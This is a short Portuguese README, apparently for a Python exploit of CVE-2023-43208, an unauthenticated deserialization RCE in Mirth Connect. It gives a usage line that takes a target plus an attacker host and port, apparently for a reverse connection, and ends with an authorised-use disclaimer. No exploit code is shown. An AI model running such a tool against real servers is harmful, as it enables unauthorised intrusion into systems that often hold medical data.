
Exploração em Python do CVE-2023-43208 Mirth Connect RCE (XStream sem autenticação)
Este exploit aproveita uma vulnerabilidade crítica de desserialização no mecanismo XStream do Mirth Connect. Ela decorre de uma correção incompleta para a CVE-2023-37679, permitindo execução arbitrária de código não autenticada em todas as versões anteriores à 4.4.1.
python3 mirth_rce.py https://{alvo} <host_atacante> <porta_atacante>
Este script de exploit destina-se estritamente a fins educacionais e auditorias de segurança autorizadas, para auxiliar defensores na mitigação da CVE-2023-43208; qualquer uso desta ferramenta contra alvos não autorizados é ilegal e de responsabilidade exclusiva do usuário final. O autor fornece este software "no estado em que se encontra", sem quaisquer garantias, isenta-se de toda responsabilidade por possível uso indevido ou danos, e não endossa nem incentiva atividades não autorizadas. Use por sua conta e risco e somente em conformidade com as leis aplicáveis.